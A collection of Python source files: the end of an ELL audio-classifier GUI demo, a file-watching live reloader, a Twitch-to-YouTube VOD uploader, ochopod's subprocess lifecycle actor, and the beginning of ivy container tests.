self.classifier_entry.insert(0, self.classifier_model)
# Output section
output_frame = LabelFrame(self, text="Output")
output_frame.pack(fill=BOTH, expand=True)
self.output_text = Text(output_frame)
self.output_text.pack(fill=BOTH, padx=4, expand=True)
def setup_spectrogram_image(self):
""" this needs to be called if you load a new feature model, because the featurizer output size might have
changed. """
if self.featurizer:
dim = (self.featurizer.output_size, self.max_spectrogram_width)
self.spectrogram_image_data = np.zeros(dim, dtype=float)
self.spectrogram_widget.show(self.spectrogram_image_data)
def on_load_featurizer_model(self):
""" called when user clicks the Load button for the feature model """
filename = self.features_entry.get()
filename = filename.strip('"')
self.settings[self.FEATURIZER_MODEL_KEY] = filename
self.save_settings()
self.stop()
self.load_featurizer_model(filename)
def on_load_classifier(self):
""" called when user clicks the Load button for the feature model """
self.classifier_model = self.classifier_entry.get()
self.settings[self.CLASSIFIER_MODEL_KEY] = self.classifier_model
self.save_settings()
self.stop()
self.load_classifier(self.classifier_model)
def main(featurizer_model=None, classifier=None, auto_scale=True, sample_rate=None, channels=None, input_device=None,
categories=None, image_width=80, threshold=None, wav_file=None, clear=5, serial=None, vad_model=None,
smoothing=None, ignore_list=None):
""" Main function to create root UI and AudioDemo object, then run the main UI loop """
root = tk.Tk()
root.geometry("800x800")
app = AudioDemo(featurizer_model, classifier, auto_scale, sample_rate, channels, input_device, categories,
image_width, threshold, wav_file, clear, serial, vad_model, smoothing, ignore_list)
root.bind("+", app.on_plus_key)
root.bind("-", app.on_minus_key)
while True:
try:
root.mainloop()
break
except UnicodeDecodeError:
pass
if __name__ == "__main__":
arg_parser = argparse.ArgumentParser(description="Test a feature model and optional classifier in a handy GUI app")
# options
arg_parser.add_argument("--featurizer", "-m", help="Compiled ELL model to use for generating features",
default=None)
arg_parser.add_argument("--classifier", "-c", help="Compiled ELL model to use for classification",
default=None)
arg_parser.add_argument("--sample_rate", "-s", help="Audio sample rate expected by classifier",
default=16000, type=int)
arg_parser.add_argument("--channels", "-ch", help="Audio channels expected by classifier",
default=1, type=int)
arg_parser.add_argument("--input_device", "-d", help="Index of input device (see --list_devices)",
default=1, type=int)
arg_parser.add_argument("--list_devices", help="List available input devices", action="store_true")
arg_parser.add_argument("--categories", help="Provide categories file that provide labels for each predicted class")
arg_parser.add_argument("--wav_file", help="Provide an input wav file to test")
arg_parser.add_argument("--image_width", help="Provide the display width of spectrogram image",
type=int, default=80)
arg_parser.add_argument("--threshold", help="Ignore predictions below given confidence threshold (0 to 1)",
type=float, default=0)
arg_parser.add_argument("--clear", help="Seconds before clearing output (default 5)",
type=float, default=5)
arg_parser.add_argument("--serial", help="Name of serial port to read (default None)")
arg_parser.add_argument("--auto_scale", help="Whether to auto scale audio input to range [-1, 1]",
action="store_true")
arg_parser.add_argument("--vad", help="Use given vad.ell model to determine when to reset the classifier")
arg_parser.add_argument("--smoothing", help="Use a smoothing buffer over preditions specifying 'vad' to smooth "
"based on VAD signal, or with a fixed number of previous N predictions (default None)")
arg_parser.add_argument("--ignore_list",
help="comma separated list of category labels to ignore (like 'background' or 'silence')")
args = arg_parser.parse_args()
if args.serial and args.input_device:
raise Exception("The --serial and --input_device options are mutually exclusive")
if args.list_devices:
microphone.list_devices()
else:
main(args.featurizer, args.classifier, args.auto_scale,
args.sample_rate, args.channels, args.input_device, args.categories,
args.image_width, args.threshold, args.wav_file, args.clear, args.serial, args.vad, args.smoothing,
args.ignore_list)
|
aoiklivereload.py
|
# coding: utf-8
"""
Live reloader that detects module file changes and reloads the program.
"""
from __future__ import absolute_import
# Standard imports
import os
import subprocess
import sys
import threading
import time
# External imports
from watchdog.events import FileSystemEventHandler
from watchdog.observers import Observer
try:
# Python 3
from _thread import interrupt_main
except ImportError:
# Python 2
from thread import interrupt_main
# Version
__version__ = '0.1.0'
# Public attributes
__all__ = (
'LiveReloader',
)
class LiveReloader(FileSystemEventHandler):
"""
Live reloader that detects module file changes and reloads the program.
"""
# Reload mode constants
RELOAD_MODE_V_EXEC = 'exec'
RELOAD_MODE_V_SPAWN_EXIT = 'spawn_exit'
RELOAD_MODE_V_SPAWN_WAIT = 'spawn_wait'
RELOAD_MODE_VALUES = (
RELOAD_MODE_V_EXEC,
RELOAD_MODE_V_SPAWN_EXIT,
RELOAD_MODE_V_SPAWN_WAIT,
)
def __init__(
self,
reload_mode=None,
force_exit=False,
extra_paths=None,
interval=1,
):
"""
Constructor.
:param reload_mode:
Reload mode.
Default is 'spawn_wait' for Windows and 'exec' otherwise.
Notice `exec` reload mode will crash on Windows.
Allowed values:
- 'exec': Replace the current process with a new process.
- 'spawn_exit': Spawn a subprocess, the current process exits.
- 'spawn_wait': Spawn a subprocess, the current process waits.
:param force_exit:
In `spawn_exit` mode, whether call `os._exit` to force the \
current process to terminate immediately. Default is not.
:param extra_paths:
Extra file paths to watch for changes.
:param interval:
Sleep interval between two change checks, in seconds.
:return:
None.
"""
# If reload mode is not given
if reload_mode is None:
# If in Windows
if sys.platform == 'win32':
# Use default `spawn_wait`
reload_mode = self.RELOAD_MODE_V_SPAWN_WAIT
# If not in Windows
else:
# Use default `exec`
reload_mode = self.RELOAD_MODE_V_EXEC
# If reload mode is not valid
if reload_mode not in self.RELOAD_MODE_VALUES:
# Get error message
error_msg = 'Invalid reload mode: {}.'.format(repr(reload_mode))
# Raise error
raise ValueError(error_msg)
# Store reload mode
self._reload_mode = reload_mode
# Store whether force exit
self._force_exit = bool(force_exit)
# Convert given extra paths to absolute
self._extra_paths = set(
os.path.abspath(x) for x in (extra_paths or ())
)
# Store check interval
self._interval = interval
# Set of watch paths
self._watch_paths = set()
# Whether the watcher thread should stop
self._watcher_to_stop = False
def start_watcher_thread(self):
"""
Start watcher thread.
:return:
Watcher thread object.
"""
# Create watcher thread
watcher_thread = threading.Thread(target=self.run_watcher)
# If the reload mode is `spawn_wait`
if self._reload_mode == self.RELOAD_MODE_V_SPAWN_WAIT:
# Use non-daemon thread
daemon = False
# If the reload mode is not `spawn_wait`
else:
# Use daemon thread
daemon = True
# Set whether the thread is daemon
watcher_thread.setDaemon(daemon)
# Start watcher thread
watcher_thread.start()
# Return watcher thread
return watcher_thread
def run_watcher(self):
"""
Watcher thread's function.
:return:
None.
"""
# Create observer
observer = Observer()
# Start observer
observer.start()
# Dict that maps file path to `watch object`
watche_obj_map = {}
# Run change check in a loop
while not self._watcher_to_stop:
# Get current watch paths
old_watch_path_s = set(watche_obj_map)
# Get new watch paths
new_watch_path_s = self._find_watch_paths()
# For each new watch path
for new_watch_path in new_watch_path_s:
# Remove from the old watch paths if exists
old_watch_path_s.discard(new_watch_path)
# If the new watch path was not watched
if new_watch_path not in watche_obj_map:
try:
# Schedule a watch
watch_obj = observer.schedule(
# 2KGRW
# `FileSystemEventHandler` instance
self,
# File path to watch
new_watch_path,
# Whether recursive
recursive=True,
)
# Store the watch obj
watche_obj_map[new_watch_path] = watch_obj
# If have error
except OSError:
# Set the watch object be None
watche_obj_map[new_watch_path] = None
# For each old watch path that is not in the new watch paths
for old_watch_path in old_watch_path_s:
# Get watch object
watch_obj = watche_obj_map.pop(old_watch_path, None)
# If have watch object
if watch_obj is not None:
# Unschedule the watch
observer.unschedule(watch_obj)
# Store new watch paths
self._watch_paths = new_watch_path_s
# Sleep before next check
time.sleep(self._interval)
def _find_watch_paths(self):
"""
Find paths to watch.
:return:
Paths to watch.
"""
# Add directory paths in `sys.path` to watch paths
watch_path_s = set(os.path.abspath(x) for x in sys.path)
# For each extra path
for extra_path in self._extra_paths or ():
# Get the extra path's directory path
extra_dir_path = os.path.dirname(os.path.abspath(extra_path))
# Add to watch paths
watch_path_s.add(extra_dir_path)
# For each module in `sys.modules`
for module in list(sys.modules.values()):
# Get module file path
module_path = getattr(module, '__file__', None)
# If have module file path
if module_path is not None:
# Get module directory path
module_dir_path = os.path.dirname(os.path.abspath(module_path))
# Add to watch paths
watch_path_s.add(module_dir_path)
# Find short paths of these watch paths.
# E.g. if both `/home` and `/home/aoik` exist, only keep `/home`.
watch_path_s = self._find_short_paths(watch_path_s)
# Return the watch paths
return watch_path_s
def _find_short_paths(self, paths):
"""
Find short paths of given paths.
E.g. if both `/home` and `/home/aoik` exist, only keep `/home`.
:param paths:
Paths.
:return:
Set of short paths.
"""
# Split each path to parts.
# E.g. '/home/aoik' to ['', 'home', 'aoik']
path_parts_s = [path.split(os.path.sep) for path in paths]
# Root node
root_node = {}
# Sort these path parts by length, with the longest being the first.
#
# Longer paths appear first so that their extra parts are discarded
# when a shorter path is found at 5TQ8L.
#
# Then for each path's parts.
for parts in sorted(path_parts_s, key=len, reverse=True):
# Start from the root node
node = root_node
# For each part of the path
for part in parts:
# Create node of the path
node = node.setdefault(part, {})
# 5TQ8L
# Clear the last path part's node's child nodes.
#
# This aims to keep only the shortest path that needs be watched.
#
node.clear()
# Short paths
short_path_s = set()
# Collect leaf paths
self._collect_leaf_paths(
node=root_node,
path_parts=(),
leaf_paths=short_path_s,
)
# Return short paths
return short_path_s
def _collect_leaf_paths(self, node, path_parts, leaf_paths):
"""
Collect paths of leaf nodes.
:param node:
Starting node. Type is dict.
Key is child node's path part. Value is child node.
:param path_parts:
The starting node's path parts. Type is tuple.
:param leaf_paths:
Leaf path list.
:return:
None.
"""
# If the node is leaf node
if not node:
# Get node path
node_path = '/'.join(path_parts)
# Add to list
leaf_paths.add(node_path)
# If the node is not leaf node
else:
# For each child node
for child_path_part, child_node in node.items():
# Get the child node's path parts
child_path_part_s = path_parts + (child_path_part,)
# Visit the child node
self._collect_leaf_paths(
node=child_node,
path_parts=child_path_part_s,
leaf_paths=leaf_paths,
)
def dispatch(self, event):
"""
Dispatch file system event.
Callback called when there is a file system event. Hooked at 2KGRW.
This function overrides `FileSystemEventHandler.dispatch`.
:param event:
File system event object.
:return:
None.
"""
# Get file path
file_path = event.src_path
# If the file path is in extra paths
if file_path in self._extra_paths:
# Call `reload`
self.reload()
# If the file path ends with `.pyc` or `.pyo`
if file_path.endswith(('.pyc', '.pyo')):
# Get `.py` file path
file_path = file_path[:-1]
# If the file path ends with `.py`
if file_path.endswith('.py'):
# Get the file's directory path
file_dir = os.path.dirname(file_path)
# If the file's directory path starts with any of the watch paths
if file_dir.startswith(tuple(self._watch_paths)):
# Call `reload`
self.reload()
def reload(self):
"""
Reload the program.
:return:
None.
"""
# Get reload mode
reload_mode = self._reload_mode
# If reload mode is `exec`
if self._reload_mode == self.RELOAD_MODE_V_EXEC:
# Call `reload_using_exec`
self.reload_using_exec()
# If reload mode is `spawn_exit`
elif self._reload_mode == self.RELOAD_MODE_V_SPAWN_EXIT:
# Call `reload_using_spawn_exit`
self.reload_using_spawn_exit()
# If reload mode is `spawn_wait`
elif self._reload_mode == self.RELOAD_MODE_V_SPAWN_WAIT:
# Call `reload_using_spawn_wait`
self.reload_using_spawn_wait()
# If reload mode is none of above
else:
# Get error message
error_msg = 'Invalid reload mode: {}.'.format(repr(reload_mode))
# Raise error
raise ValueError(error_msg)
def reload_using_exec(self):
"""
Reload the program process.
:return:
None.
"""
# Create command parts
cmd_parts = [sys.executable] + sys.argv
# Get env dict copy
env_copy = os.environ.copy()
# Reload the program process
os.execvpe(
# Program file path
sys.executable,
# Command parts
cmd_parts,
# Env dict
env_copy,
)
def reload_using_spawn_exit(self):
"""
Spawn a subprocess and exit the current process.
:return:
None.
"""
# Create command parts
cmd_parts = [sys.executable] + sys.argv
# Get env dict copy
env_copy = os.environ.copy()
# Spawn subprocess
subprocess.Popen(cmd_parts, env=env_copy, close_fds=True)
# If need force exit
if self._force_exit:
# Force exit
os._exit(0) # pylint: disable=protected-access
# If not need force exit
else:
# Send interrupt to main thread
interrupt_main()
# Set the flag
self._watcher_to_stop = True
# Exit the watcher thread
sys.exit(0)
def reload_using_spawn_wait(self):
"""
Spawn a subprocess and wait until it finishes.
:return:
None.
"""
# Create command parts
cmd_parts = [sys.executable] + sys.argv
# Get env dict copy
env_copy = os.environ.copy()
# Send interrupt to main thread
interrupt_main()
# Spawn subprocess and wait until it finishes
subprocess.call(cmd_parts, env=env_copy, close_fds=True)
# Exit the watcher thread
sys.exit(0)
|
vodloader.py
|
from twitchAPI.types import VideoType
from time import sleep
from threading import Thread
import logging
from vodloader_video import vodloader_video
from vodloader_status import vodloader_status
from youtube_uploader import YouTubeOverQuota, youtube_uploader
import datetime
import pytz
import os
class vodloader(object):
def __init__(self, channel, twitch, webhook, twitch_config, yt_json, download_dir, keep=False, upload=True, sort=True, quota_pause=True, tz=pytz.timezone("America/Chicago")):
self.end = False
self.channel = channel
self.logger = logging.getLogger(f'vodloader.{self.channel}')
self.logger.info(f'Setting up vodloader for {self.channel}')
self.tz = tz
self.download_dir = download_dir
self.keep = keep
self.twitch = twitch
self.webhook = webhook
self.upload = upload
self.quota_pause = quota_pause
if self.upload:
self.uploader = youtube_uploader(self, yt_json, twitch_config['youtube_param'], sort)
if self.uploader.sort:
self.uploader.sort_playlist(twitch_config['youtube_param']['playlistId'])
else:
self.uploader = None
self.user_id = self.get_user_id()
self.status = vodloader_status(self.user_id)
self.sync_status()
self.get_live()
self.webhook_subscribe()
if 'chapters' in twitch_config and twitch_config['chapters'] != "":
self.chapters_type = twitch_config['chapters']
else:
self.chapters_type = False
if 'quality' in twitch_config and twitch_config['quality'] != "":
self.quality = twitch_config['quality']
else:
self.quality = 'best'
if 'backlog' in twitch_config and twitch_config['backlog']:
self.backlog = twitch_config['backlog']
else:
self.backlog = False
if self.backlog:
self.backlog_process = Thread(target=self.backlog_buffload, args=(), daemon=True)
self.backlog_process.start()
def __del__(self):
self.webhook_unsubscribe()
def callback_stream_changed(self, uuid, data):
self.logger.info(f'Received webhook callback for {self.channel}')
if data['type'] == 'live':
if not self.live:
self.live = True
self.logger.info(f'{self.channel} has gone live!')
url = 'https://www.twitch.tv/' + self.channel
self.livestream = vodloader_video(self, url, data, backlog=False, quality=self.quality)
else:
self.live = True
if self.livestream.chapters.get_current_game() != data["game_name"]:
self.logger.info(f'{self.channel} has changed game to {data["game_name"]}')
if self.livestream.chapters.get_current_title() != data["title"]:
self.logger.info(f'{self.channel} has changed their title to {data["title"]}')
self.livestream.chapters.append(data['game_name'], data['title'])
else:
self.live = False
self.logger.info(f'{self.channel} has gone offline')
def get_live(self):
data = self.twitch.get_streams(user_id=self.user_id)
if not data['data']:
self.live = False
elif data['data'][0]['type'] == 'live':
self.live = True
else:
self.live = False
return self.live
def webhook_unsubscribe(self):
if self.webhook_uuid:
success = self.webhook.unsubscribe(self.webhook_uuid)
if success:
self.webhook_uuid = ''
self.logger.info(f'Unsubscribed from webhook for {self.channel}')
return success
def webhook_subscribe(self):
success, uuid = self.webhook.subscribe_stream_changed(self.user_id, self.callback_stream_changed)
if success:
self.webhook_uuid = uuid
self.logger.info(f'Subscribed to webhook for {self.channel}')
else:
self.webhook_uuid = None
return success
def get_user_id(self):
user_info = self.twitch.get_users(logins=[self.channel])
return user_info['data'][0]['id']
def sync_status(self):
ids = []
for id in self.status.copy():
if self.status[id] == False:
if not os.path.isfile(os.path.join(self.download_dir, f'{id}.ts')):
self.status.pop(id)
try:
for video in self.uploader.get_channel_videos():
if video['tvid']:
if video['part'] and video['part'] > 1:
ids.append(f'{video["tvid"]}p{video["part"]}')
else:
ids.append(str(video['tvid']))
for id in self.status.copy():
if not id in ids and self.status[id] == True:
self.status.pop(id)
for id in ids:
self.status[id] = True
self.logger.debug('Status synced with YouTube uploads')
except YouTubeOverQuota:
self.logger.error("YouTube quota is exceeded, can't sync status")
self.status.save()
def get_twitch_videos(self, video_type=VideoType.ARCHIVE):
cursor = None
videos = []
while True:
data = self.twitch.get_videos(user_id=self.user_id, first=100, after=cursor)
for video in data['data']:
if video['type'] == video_type:
videos.append(video)
if not 'cursor' in data['pagination']:
break
else:
cursor = data['pagination']['cursor']
return videos
def backlog_buffload(self):
videos = self.get_twitch_videos()
videos.sort(reverse=False, key=lambda x: datetime.datetime.strptime((x['created_at']), '%Y-%m-%dT%H:%M:%SZ'))
for video in videos:
if self.end: exit()
if self.uploader.pause and self.quota_pause:
self.logger.info('Pausing backlog processing until YouTube quota is refreshed')
while self.uploader.pause:
sleep(10)
self.backlog_video = vodloader_video(self, video['url'], video, backlog=True, quality=self.quality)
self.backlog_video.thread.join()
|
piped.py
|
#
# Copyright (c) 2015 Autodesk Inc.
# All rights reserved
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import json
import logging
import pykka
import time
import os
from collections import deque
from copy import deepcopy
from ochopod.api import Cluster, Piped
from ochopod.core.core import SAMPLING
from ochopod.core.fsm import Aborted, FSM, diagnostic
from pykka import ThreadingFuture
from subprocess import Popen, PIPE, STDOUT
from threading import Thread
#: Our ochopod logger.
logger = logging.getLogger('ochopod')
class _Cluster(Cluster):
"""
Wrapper packaging the leader information in a user-friendly way and providing a dependency lookup
helper.
"""
def __init__(self, js):
super(_Cluster, self).__init__()
self.key = js['key']
self.pods = js['pods']
self.dependencies = js['dependencies']
self.index = sorted(self.pods.keys()).index(self.key)
self.seq = self.pods[self.key]['seq']
self.size = len(self.pods)
def grep(self, dependency, port, public=False):
if not dependency in self.dependencies:
return ''
out = []
nodes = self.dependencies[dependency]
for node in nodes.values():
ip = node['public' if public else 'ip']
assert str(port) in node['ports'], 'pod from %s not exposing port %d ?' % (dependency, port)
out.append('%s:%d' % (ip, node['ports'][str(port)]))
return ','.join(out)
class Actor(FSM, Piped):
"""
Implementation for our pod life-cycle, managing an underlying sub-process.
"""
def __init__(self, env, latch, hints):
super(Actor, self).__init__()
self.commands = deque()
self.env = env
self.hints = hints
self.hints['process'] = 'stopped'
self.initialized = 0
self.last = {}
self.latches.append(latch)
self.path = 'lifecycle (piped process)'
self.start = hints['start'] == 'true'
self.terminate = 0
def initialize(self):
pass
def can_configure(self, js):
pass
def configured(self, js):
pass
def sanity_check(self, process):
pass
def finalize(self):
pass
def configure(self, js):
#
# - this is the only method that *must* be implemented by the user
#
raise NotImplementedError
def tear_down(self, running):
#
# - simply send by default a SIGTERM to the underlying process
# - this should be good enough in the vast majority of cases
#
running.terminate()
def initial(self, data):
data.checks = self.checks
data.command = None
data.failed = 0
data.pids = 0
data.js = {}
data.next_sanity_check = 0
data.sub = None
return 'spin', data, 0
def reset(self, data):
if data.sub and data.sub.poll() is None:
#
# - the state-machine will often be reset on purpose
# - this happens when we need to first terminate the process
#
try:
logger.info('%s : tearing down process %s' % (self.path, data.sub.pid))
self.hints['process'] = 'terminating'
self.tear_down(data.sub)
except Exception as _:
pass
#
# - we now need to poll until the sub-process is deemed dead (if it is
# running at this point)
#
data.reset_at = time.time()
return 'wait_for_termination', data, 0
def wait_for_termination(self, data):
elapsed = time.time() - data.reset_at
if data.sub:
#
# - check whether or not the process is still running
# - it may take some time (especially in term of graceful shutdown)
#
if data.sub.poll() is None:
if elapsed < self.grace:
#
# - not done yet, spin
#
return 'wait_for_termination', data, SAMPLING
elif self.soft:
#
# - if the soft switch is on bypass the SIGKILL completely
# - this is a special case to handle peculiar scenarios
#
logger.info('%s: bypassing the forced termination (leaking pid %s)...' % (self.path, data.sub.pid))
else:
#
# - the process is stuck, force a SIGKILL
# - silently trap any failure
#
logger.info('%s : pid %s not terminating, killing it' % (self.path, data.sub.pid))
try:
data.sub.kill()
except Exception as _:
pass
else:
logger.debug('%s : pid %s terminated in %d seconds' % (self.path, data.sub.pid, int(elapsed)))
data.sub = None
self.hints['process'] = 'stopped'
return 'spin', data, 0
def spin(self, data):
if self.terminate:
if not data.sub:
#
# - kill the actor (which will release the latch and unlock the main loop)
#
self.exitcode()
else:
#
# - this will force a reset and make sure we kill the process
# - we'll loop back to spin() in any case and exitcode() this time
#
raise Aborted('terminating')
elif self.commands:
#
# - we have at least one request pending
# - pop the next command and run it (e.g switch the state-machine to it)
#
req, js, latch = self.commands[0]
data.js = js
data.latch = latch
return req, data, 0
elif data.sub:
#
# - check if the process is still running
#
now = time.time()
if data.sub.poll() is None:
if now >= data.next_sanity_check:
#
# - schedule the next sanity check
# - assert if the process aborted since the last one
#
data.next_sanity_check = now + self.check_every
try:
assert not data.failed, \
'%s : too many process failures (%d since last check)' % (self.path, data.failed)
js = self.sanity_check(data.sub.pid)
self.hints['metrics'] = {} if js is None else js
data.checks = self.checks
data.failed = 0
except Exception as failure:
#
# - any failure trapped during the sanity check will decrement our counter
# - eventually the process is stopped (up to the user to decide what to do)
#
data.checks -= 1
data.failed = 0
logger.warning('%s : sanity check (%d/%d) failed -> %s' %
(self.path, self.checks - data.checks, self.checks, diagnostic(failure)))
if not data.checks:
logger.warning('%s : turning pod off' % self.path)
data.checks = self.checks
self._request(['off'])
else:
code = data.sub.returncode
if not code:
#
# - a successful exit code (0) will automatically force a shutdown
# - this is a convenient way for pods go down automatically once their task is done
#
logger.error('%s : pid %s exited, shutting down' % (self.path, data.sub.pid))
self._request(['kill'])
else:
#
# - the process died on a non zero exit code
# - increment the failure counter (too many failures in a row will fail the sanity check)
# - restart it gracefully
#
data.failed += 1
logger.error('%s : pid %s died (code %d), re-running' % (self.path, data.sub.pid, code))
self._request(['off', 'on'])
else:
#
# - reset by default the metrics if the sub-process is not running
#
self.hints['metrics'] = {}
return 'spin', data, SAMPLING
def on(self, data):
if data.sub and data.js and (self.strict or data.js['dependencies'] != self.last['dependencies']):
#
# - if we already have a process, we want to re-configure -> force a reset first
# - this will go through a graceful termination process
# - we'll come back here afterwards (with data.sub set to None)
#
raise Aborted('resetting to terminate pid %s first' % data.sub.pid)
elif data.sub:
#
# - the process is already running, fail gracefully on a 200
# - this is the code-path used for instance up a leader request when strict is false
#
reply = {}, 200
logger.debug('%s : skipping /control/on request' % self.path)
data.latch.set(reply)
else:
#
# - no more process running, go on with the configuration
#
try:
if not self.initialized:
#
# - if this is the 1st time the pod is running invoke the initialize() callback
# - this is typically used to run once-only stuff such as attaching storage volumes, etc.
#
logger.info('%s : initializing pod' % self.path)
self.initialize()
self.initialized = 1
if data.js:
#
# - run the configuration procedure if we have some json
# - we'll use whatever it returns to popen() a new process
# - keep track of the shell command line returned by configure() for later
# - make sure the optional overrides set by configure() are strings
#
cluster = _Cluster(data.js)
logger.info('%s : configuring pod %d/%d' % (self.path, 1 + cluster.index, cluster.size))
data.command, overrides = self.configure(cluster)
data.env = {key: str(value) for key, value in overrides.items()}
self.last = data.js
assert data.command, 'request to start process while not yet configured (user error ?)'
#
# - spawn a new sub-process if the auto-start flag is on OR if we already ran at least once
# - the start flag comes from the $ochopod_start environment variable
#
if not data.js or self.start or data.pids > 0:
#
# - combine our environment variables with the overrides from configure()
# - popen() the new process and log stdout/stderr in a separate thread if required
# - make sure to set close_fds in order to avoid sharing the flask socket with the subprocess
# - reset the sanity check counter
# - keep track of its pid to kill it later on
#
env = deepcopy(self.env)
env.update(data.env)
tokens = data.command if self.shell else data.command.split(' ')
if self.pipe_subprocess:
#
# - set the popen call to use piping if required
# - spawn an ancillary thread to forward the lines to our logger
# - this thread will go down automatically when the sub-process does
#
data.sub = Popen(tokens,
close_fds=True,
cwd=self.cwd,
env=env,
shell=self.shell,
stderr=STDOUT,
stdout=PIPE)
def _pipe(process):
while True:
line = process.stdout.readline().rstrip('\n')
code = process.poll()
if line == '' and code is not None:
break
logger.info('pid %s : %s' % (process.pid, line))
out = Thread(target=_pipe, args=(data.sub,))
out.daemon = True
out.start()
else:
#
# - default popen call without piping
#
data.sub = Popen(tokens,
close_fds=True,
cwd=self.cwd,
env=env,
shell=self.shell)
data.pids += 1
data.next_sanity_check = 0
self.hints['process'] = 'running'
logger.info('%s : popen() #%d -> started <%s> as pid %s' % (self.path, data.pids, data.command, data.sub.pid))
if data.env:
unrolled = '\n'.join(['\t%s -> %s' % (k, v) for k, v in data.env.items()])
logger.debug('%s : extra environment for pid %s ->\n%s' % (self.path, data.sub.pid, unrolled))
reply = {}, 200
data.latch.set(reply)
except Exception as failure:
#
# - any failure trapped during the configuration -> HTTP 406
# - the pod will shutdown automatically as well
#
reply = {}, 406
logger.warning('%s : failed to configure -> %s, shutting down' % (self.path, diagnostic(failure)))
self._request(['kill'])
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def check(self, data):
try:
#
# - simply invoke the user-defined readiness check (typically to allow making sure all
# the required dependencies are available before starting anything)
#
reply = {}, 200
cluster = _Cluster(data.js)
self.can_configure(cluster)
data.latch.set(reply)
except Exception as failure:
#
# - any failure trapped during the configuration -> HTTP 406
#
reply = {}, 406
logger.warning('%s : failed to run the pre-check -> %s' % (self.path, diagnostic(failure)))
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def off(self, data):
#
# - the /stop request does basically nothing
# - it only guarantees we terminate the process
#
if data.sub:
raise Aborted('resetting to terminate pid %s' % data.sub.pid)
reply = {}, 200
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def kill(self, data):
#
# - the /kill request will first guarantee we terminate the process
#
if data.sub:
raise Aborted('resetting to terminate pid %s' % data.sub.pid)
try:
#
# - invoke the optional finalize() callback
#
logger.info('%s : finalizing pod' % self.path)
self.finalize()
except Exception as failure:
#
# - log something if for some reason finalize() failed as we can't really recover
# - don't bother responding with a 406
#
logger.warning('%s : failed to finalize -> %s' % (self.path, diagnostic(failure)))
#
# - in any case request a termination and tag the pod as 'dead'
#
reply = {}, 200
self.terminate = 1
self.hints['process'] = 'dead'
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def signal(self, data):
try:
logger.debug('%s : user signal received' % self.path)
js = self.signaled(data.js, process=data.sub)
reply = js if js else {}, 200
except Exception as failure:
#
# - abort on a 500 upon any failure
#
reply = {}, 500
logger.warning('%s : failed to signal -> %s' % (self.path, diagnostic(failure)))
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def ok(self, data):
try:
assert data.js, 'control/ok received out of context (leader bug ?)'
logger.debug('%s : cluster has been formed, invoking configured()' % self.path)
cluster = _Cluster(data.js)
self.configured(cluster)
reply = {}, 200
except Exception as failure:
#
# - abort on a 500 upon any failure
#
reply = {}, 500
logger.warning('%s : failed to signal -> %s' % (self.path, diagnostic(failure)))
data.latch.set(reply)
self.commands.popleft()
return 'spin', data, 0
def specialized(self, msg):
assert 'request' in msg, 'bogus message received ?'
req = msg['request']
if req in ['check', 'on', 'off', 'ok', 'kill', 'signal']:
#
# - we got a request from the leader or the CLI
# - pile it in the FIFO along with its latch
#
js = {}
try:
js = json.loads(msg['data'])
except ValueError:
pass
self.commands.append((req, js, msg['latch']))
else:
super(Actor, self).specialized(msg)
def _request(self, tokens):
#
# - we use this help to schedule commands internally (mostly used to switch
# the pod on/off)
#
for token in tokens:
self.commands.append((token, {}, ThreadingFuture()))
|
test_container.py
|
# global
import os
import queue
import pickle
import pytest
import random
import numpy as np
import multiprocessing
# local
import ivy
from ivy.container import Container
import ivy_tests.test_ivy.helpers as helpers
def test_container_list_join(dev, call):
container_0 = Container({'a': [ivy.array([1], dev=dev)],
'b': {'c': [ivy.array([2], dev=dev)], 'd': [ivy.array([3], dev=dev)]}})
container_1 = Container({'a': [ivy.array([4], dev=dev)],
'b': {'c': [ivy.array([5], dev=dev)], 'd': [ivy.array([6], dev=dev)]}})
container_list_joined = ivy.Container.list_join([container_0, container_1])
assert np.allclose(ivy.to_numpy(container_list_joined['a'][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_joined['b']['c'][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_joined['b']['d'][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_joined['a'][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_joined['b']['c'][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_joined['b']['d'][1]), np.array([6]))
assert np.allclose(ivy.to_numpy(container_list_joined.b.d[1]), np.array([6]))
def test_container_list_stack(dev, call):
container_0 = Container({'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}})
container_1 = Container({'a': ivy.array([4], dev=dev),
'b': {'c': ivy.array([5], dev=dev), 'd': ivy.array([6], dev=dev)}})
container_list_stacked = ivy.Container.list_stack([container_0, container_1], 0)
assert np.allclose(ivy.to_numpy(container_list_stacked['a'][0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[0]), np.array([1]))
assert np.allclose(ivy.to_numpy(container_list_stacked['b']['c'][0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[0]), np.array([2]))
assert np.allclose(ivy.to_numpy(container_list_stacked['b']['d'][0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.d[0]), np.array([3]))
assert np.allclose(ivy.to_numpy(container_list_stacked['a'][1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked.a[1]), np.array([4]))
assert np.allclose(ivy.to_numpy(container_list_stacked['b']['c'][1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked.b.c[1]), np.array([5]))
assert np.allclose(ivy.to_numpy(container_list_stacked['b']['d'][1]), np.array([6]))
